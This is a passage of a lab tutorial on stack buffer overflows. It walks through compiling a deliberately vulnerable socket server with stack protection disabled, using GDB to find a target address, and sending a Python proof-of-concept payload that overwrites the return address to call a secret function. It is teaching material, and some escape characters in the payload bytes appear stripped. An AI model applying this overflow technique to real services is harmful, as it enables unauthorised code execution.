memory beside the variables which means we can modify the return address. Imagine a situation where an application calls a function that is vulnerable to a buffer overflow attack. After calling the vulnerable function, the application tests if a condition is true (using a secret rule). From the attackers point of view, the secret condition is not important. However the instructions that would be executed if the condition is true, are the target for an attack. To do this the attacker must overflow the buffer in the vulnerable function and must write a memory address into the buffer which overwrites the return address at the bottom of the stack frame. This address should not point at the condition, but it should point at the first instruction that would be executed if the condition were true. To start you compile and run the program, it opens a network socket on a port number supplied in the parameter and waits for a connection. When a network connection is initiated, it echos back whatever is sent. To compile the program on a 64bit machine running Linux use the following command.: gcc -fno-stack-protector -mpreferred-stack-boundary=4 -ggdb program.c -o a.out To run the program you can type: . /a.out 8080 To connect to the program you can use telnet, but it will not permit you to type non-printable characters outside of the ASCII range. Non-printable character are necessary to write a return address in binary. telnet localhost 8080
  • 2. Alternatively, if you do not wish to use telnet and would like to use a script here is an example in python (note the memory addresses on Intel CPUs are in little endian format): import socket host = "localhost" port = 8080 size = 30 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send("AAAAAAAx00") data = s.recv(size) s.close() print data There is also a better way to execute your application than “./a.out 8080”. If you launch your application inside a debugger such as GDB you can add breakpoints to pause execution, you can see the instructions, you can see the memory addresses of the instructions and you can see your stack frame. gdb ./a.out Inside GDB the following commands are useful to know. disas HandleTCPClient Disassemble the function “HandleTCPClient” disas vulnerable Disassemble the function “vulnerable” set args 8080 Set the program arguments to “8080” break *0x1234567 Set a breakpoint to pause execution at memory address “1234567”. Hint: try setting this to the last instruction in the vulnerable function. break main Set a breakpoint at the main function run Execute the program until a breakpoint is reached step Execute the next instruction in the executable info frame Display the current stack frame information. Try doing this when you a the breakpoint. x/128xb $rsp Display 128 bytes of memory in hexadecimal ($rsp is the stack pointer, sometimes $esp). print variable Display value of variable continue Continue executing the program until the next breakpoint is reached. kill Terminate the application without exiting the debugger quit Exit the GDB application To disassemble the executable outside the debugger try: objdump -d ./a.out > output.txt Note: If you kill the program mid execution, then it may hold the listening port in a waiting state for approximately 55 seconds. This timeout can be monitored using the command : sudo watch -n 0 netstat -tunpal
  • 3. The trick to creating an exploit for the application is to create a long string with the virtual address of the instruction we want to jump to. This virtual address should be appended to the end of the buffer so that it overwrites the return address at the bottom of the stack frame. To find this address run the following command: gdb ./a.out 8080 (gdb) disas HandleTCPClient It should give the following output: 0x0000000000400bf3 <+74>: callq 0x400b6a <vulnerable> 0x0000000000400bf8 <+79>: lea -0x40(%rbp),%rax 0x0000000000400bfc <+83>: mov $0x400e59,%esi 0x0000000000400c01 <+88>: mov %rax,%rdi 0x0000000000400c04 <+91>: callq 0x4008a8 <strcmp@plt> 0x0000000000400c09 <+96>: test %eax,%eax 0x0000000000400c0b <+98>: jne 0x400c17 <HandleTCPClient+110> 0x0000000000400c0d <+100>: mov $0x0,%eax 0x0000000000400c12 <+105>: callq 0x400b99 <secret> Notice the address of the line that executes the function secret() is “400c12”. Lets append this memory address to our python exploit. You will need to customize the address for your own system. import socket host = "localhost" port = 8080 size = 30 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send("AAAAAAAAAAAAAAAAAAAAAAAAx12x0cx40x00x00") data = s.recv(size) s.close() print data Run the exploit using the following command: python pycracker.py The server should output the following lines: Talking with client 127.0.0.1 This application has been cracked! Bus error